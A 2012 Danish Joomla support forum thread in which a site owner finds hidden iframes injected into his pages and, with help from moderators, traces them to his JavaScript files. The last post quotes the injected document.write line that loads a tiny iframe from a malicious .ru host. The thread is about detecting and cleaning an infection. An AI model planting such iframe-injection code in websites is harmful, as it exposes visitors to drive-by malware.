Hacket? w3c iframes i toppen af site

Her kan du stille spørgsmål til den daglige administration af dit Joomla! websted.

Moderators: b-ronnow, ot2sen

Locked
User avatar
carbonarm
Joomla! Enthusiast
Joomla! Enthusiast
Posts: 195
Joined: Wed Nov 09, 2005 11:05 am
Location: JoomlaTown
Contact:

Hacket? w3c iframes i toppen af site

Post by carbonarm » Mon Oct 15, 2012 6:11 pm

Jeg var først sikker på at mine hjemmesider var blevet hacket, men er ikke helt sikker efter jeg tog en backup af alle filer og søgte efter de koder der kommer frem i toppen af hjemmesiderne, fordi koderne var der ikke!

Kig på ** formtop.dk Der er et mellemrum i toppen af siden og hvis du tager firebug eller bare ser kildekoden, ser du iframes lige efter header tags med ref til stien="http://textheavylosing.org/Lexmark?8"
Selve iframes'ene er sat til 5px højde, men øger jeg dem til 600px, ser jeg den offeicielle side til w3c.org som bekendt er www's standarder for html og css.

Jeg har været hacket før, men har kunne finde koderne når jeg søger via windows fil søger, men denne her kan jeg sku ikke finde, og der vises hele 9 imframes lige efter headeren.... jeg fatter ingenting...håber der er nogen der har et godt gæt på hvad jeg kan gøre!!!
Last edited by ot2sen on Mon Oct 15, 2012 6:19 pm, edited 1 time in total.
Reason: ** Mod note: aktivt link gjort inaktivt da der kom en alert om malcious cookie etc. som blev blokeret her. Så for at skåne andre er linket deaktiveret
www.jakoba.dk - nemt, hurtigt og billigt website!
- Nyt Website!
- Profesionelt Design!
- Ændringer af eksisterende Templates, Komponenter, Moduler og Plugins!

User avatar
ot2sen
Joomla! Master
Joomla! Master
Posts: 10415
Joined: Thu Aug 18, 2005 9:58 am
Location: Hillerød - Denmark
Contact:

Re: Hacket? w3c iframes i toppen af site

Post by ot2sen » Mon Oct 15, 2012 6:21 pm

Hej Carbonarm,

Du bør tage et grundigere tjek. Det er givetvis noget andet kode der henter det endelig output.
Men siden er inficeret som du kan se i den note jeg lavede ovenfor.
Ole Bang Ottosen
Dansk frivillig Joomla! support websted - joomla.dk
OpenTranslators Core Team opentranslators.org

User avatar
carbonarm
Joomla! Enthusiast
Joomla! Enthusiast
Posts: 195
Joined: Wed Nov 09, 2005 11:05 am
Location: JoomlaTown
Contact:

Re: Hacket? w3c iframes i toppen af site

Post by carbonarm » Mon Oct 15, 2012 7:19 pm

Takker for svar, men jeg kan ikke se dit link, da det er fjernet af forum scriptet til beskyttelse af andre.

Men enig, koden må jo komme et sted fra. Men når jeg søger på f.eks. <iframe fra rod mappen og videre, kommer der intet! Det er mærkeligt synes jeg. Der er et hav af system, modul, component og plugin filer som renderer joomlas endelige output, men hvis ikke koden findes direkte, kan javascript kalde koden? javascript er jeg ikke super stærk i, men er god php programmør.
www.jakoba.dk - nemt, hurtigt og billigt website!
- Nyt Website!
- Profesionelt Design!
- Ændringer af eksisterende Templates, Komponenter, Moduler og Plugins!

solsikkehaven
Joomla! Virtuoso
Joomla! Virtuoso
Posts: 4757
Joined: Thu Aug 18, 2005 5:24 am
Location: Vestjylland, Danmark
Contact:

Re: Hacket? w3c iframes i toppen af site

Post by solsikkehaven » Fri Oct 19, 2012 4:12 pm

Må jeg anbefale dig, hvis du ikke kan finde koden selv, øjeblikkeligt få nogen til det.

F.eks. Sucuri.net
http://sucuri.net/signup

se info om dit website her:
http://sitecheck.sucuri.net/results/formtop.dk
Morten Knudsen
http://mortenknudsen.dk - WordPress hjemmesideløsninger til vestjyske virksomheder og foreninger
http://wpguru.dk - WordPress Guru - tips & tricks til WordPress

User avatar
carbonarm
Joomla! Enthusiast
Joomla! Enthusiast
Posts: 195
Joined: Wed Nov 09, 2005 11:05 am
Location: JoomlaTown
Contact:

Re: Hacket? w3c iframes i toppen af site

Post by carbonarm » Fri Oct 19, 2012 4:24 pm

Tak for info, det ku jeg bruge til noget.

Jeg havde godt nok fundet koden i ALLE min .js filer, men ser at den også ligger i .js.php filerne.... tak for tippet til websiden der checker.

Der ser jeg også den kode jeg selv fandt i javascript filerne:
document.write('<iframe src="http://playadefrag.ru/Bermuda?8" scrolling="auto" frameborder="no" align="center" height="10" width="10"></iframe>')

Jeg har fået en kammereat der er god til Linux, at finde alle steder der starter med document.write('<iframe og ender på </iframe>') og slette dem. Så håber jeg alt kommer med og filerne renset.
www.jakoba.dk - nemt, hurtigt og billigt website!
- Nyt Website!
- Profesionelt Design!
- Ændringer af eksisterende Templates, Komponenter, Moduler og Plugins!


Locked

Return to “Administration - Generel brug”